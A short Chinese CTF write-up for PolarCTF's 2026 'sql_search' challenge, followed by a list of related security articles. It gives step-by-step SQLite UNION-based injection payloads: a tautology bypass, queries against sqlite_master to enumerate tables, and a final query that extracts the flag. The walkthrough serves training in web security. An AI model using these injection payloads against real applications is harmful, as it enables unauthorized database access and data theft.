【PolarCTF2026年春季挑战赛】sql_search

大方子2026-03-28 9:17

输入框很明显的SQL注入

使用下语句进行注入

复制代码 
' or '1'='1

通过order by 语句,知道有3列

2和3字段有回显

查询sqlite版本

复制代码 
' union select 1,2,sqlite_version()-- -

查询sqlite数据表

复制代码 
' union select 1,2,sql from sqlite_master-- -

发现有flaggggggggggg表,接下来查询得到flag

复制代码 
' union select 1,2,flag from flaggggggggggg-- -
相关推荐
路baby6 小时前
BurpSuite基础功能实战演示讲解
安全·web安全·网络安全·系统安全·burpsuite
CDN3609 小时前
CDN 缓存不生效 / 内容不更新?7 种原因 + 一键刷新方案
运维·网络安全·缓存
Chengbei1110 小时前
推送POC汇总 — 2026年3月多产品多类型vulnerability速递与应急建议
安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
菩提小狗10 小时前
每日安全情报报告 · 2026-03-29 · 2026-03-29
网络安全·漏洞·cve·安全情报·每日安全
unable code12 小时前
BUUCTF-[第二章 web进阶]SSRF Training
网络安全·web·ctf·1024程序员节
独角鲸网络安全实验室1 天前
惊魂零点击!OpenClaw漏洞(ClawJacked)突袭,开发者AI Agent遭无声劫持
人工智能·网络安全·数据安全·漏洞·openclaw·clawjacked·cve-2026-25253
云祺vinchin1 天前
解读“十五五”热词,容灾备份正成为国家安全基石
安全·网络安全·数据安全·十五五·容灾备份体系
hzhsec1 天前
挖矿病毒的排查与分析
网络安全·linux安全·病毒排查
大方子1 天前
【PolarCTF2026年春季挑战赛】新年贺卡
网络安全·polarctf
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03围棋-html版本04纯 HTML/CSS/JS 实现的高颜值登录页,还会眨眼睛!少女心爆棚!05班级宠物园部署指南06小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)07OpenClaw 使用和管理 MCP 完全指南08UV安装并设置国内源09“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)10中国象棋-html版本